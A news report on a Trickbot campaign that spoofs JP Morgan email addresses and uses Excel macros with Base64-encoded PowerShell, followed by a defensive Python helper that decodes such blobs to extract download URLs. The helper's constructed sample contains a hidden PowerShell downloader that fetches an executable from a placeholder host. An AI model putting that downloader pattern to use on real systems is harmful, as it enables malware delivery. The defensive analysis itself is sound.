- This new campaign of Trickbot imitates JP Morgan’s official email addresses to lure users into downloading the trojan from the emails.
- Attackers have used a domain registered through GoDaddy that is similar to JP Morgan.
The shapeshifting Trickbot is back in a new form. This time it poses as JP Morgan & Chase to continue its malicious campaign of infecting systems.
This version also comes with some variations: the spam emails carrying the trojan now contain Excel spreadsheets instead of the Word document attachments seen in earlier campaigns.
According to myonlinesecurity.co.uk, which reported this development, the sender addresses bear a striking resemblance to JP Morgan's.
“The email with the subject of “FW: Incoming Confirmation” pretends to come from Jane McMillan, Tax Senior at JPMorgan, but actually comes from “Jane.McMillan@chase-sdx.com” which is a look-alike, typo-squatted or other domain that can easily be misidentified, mistaken or confused with the genuine site,” the article stated.
Encoded PowerShell script
When the trojan's macro was analyzed, it was found to contain a different PowerShell script. This one is Base64 encoded, which makes it a little harder for an analyst to pinpoint the download URLs by eye, whereas online sandboxes read through the obfuscated script easily.
Users are therefore advised to disable macros in Microsoft Office or similar document software. The latest versions offer a “Protected View” that stops embedded malware, macros and DDE “exploits/features” from running.
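The Base64-encoded PowerShell described above is easy for an analyst to see through once it is decoded. The following Python helper, added here as an illustration and not taken from the campaign or the original report, decodes such blobs found in macro text and lists the download URLs they contain; the sample macro line and URL are constructed placeholders, and the assumption that the blob is UTF-16LE (as PowerShell's -EncodedCommand expects) or UTF-8 is the helper's own.

```python
import base64
import re
from typing import List, Optional

# Constructed sample (not an indicator from the campaign): a one-line downloader
# encoded the way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64),
# embedded in a VBA-style Shell call as a macro might do.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/payload/doc.exe';"
    "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\x.exe\")"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_MACRO_LINE = 'Shell "powershell -nop -w hidden -EncodedCommand ' + SAMPLE_ENCODED + '"'

# Base64 runs long enough to be a command rather than a short token.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def decode_powershell_blob(blob: str) -> Optional[str]:
    """Decode a Base64 blob to text, preferring UTF-16LE (what -EncodedCommand
    uses) and falling back to UTF-8; returns None if neither looks like script text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None
    best, best_score = None, 0.0
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        # Share of plain printable ASCII: real script text scores near 1.0,
        # a wrong-encoding decode is full of NULs or CJK-looking code units.
        score = sum(c.isascii() and (c.isprintable() or c in "\r\n\t") for c in text) / len(text)
        if score > best_score:
            best, best_score = text, score
    return best if best_score >= 0.9 else None


def extract_download_urls(macro_text: str) -> List[str]:
    """Return every http(s) URL found in the macro text, including URLs hidden
    inside Base64-encoded PowerShell blobs."""
    found = set(URL_RE.findall(macro_text))
    for blob in B64_RE.findall(macro_text):
        decoded = decode_powershell_blob(blob)
        if decoded:
            found.update(URL_RE.findall(decoded))
    return sorted(found)


if __name__ == "__main__":
    print(extract_download_urls(SAMPLE_MACRO_LINE))
```

The extracted URLs can be fed straight into proxy or DNS blocklists, which is the point the report makes: the encoding slows a human reader, not automated analysis.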